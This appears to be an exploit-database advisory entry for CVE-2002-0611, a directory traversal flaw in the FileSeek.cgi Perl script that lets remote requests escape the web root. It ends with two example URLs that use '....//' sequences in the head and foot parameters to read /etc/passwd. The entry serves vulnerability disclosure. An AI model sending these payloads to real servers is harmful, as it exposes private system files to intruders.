FileSeek - CGI Script File Disclosure

Author: Thijs Bosschert
type: webapps
platform: cgi
port: 
date_added: 2002-04-16  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2002-0611;OSVDB-3589  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22228.txt  
source: https://www.securityfocus.com/bid/6784/info

FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server.

FileSeek.cgi and FileSeek2.cgi are prone to a file disclosure vulnerability. It is possible for a remote attacker to submit a maliciously crafted web request which is capable of breaking out of the wwwroot directory and browsing arbitrary web-readable files on a host running the vulnerable script.

http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
//....//etc/passwd&foot=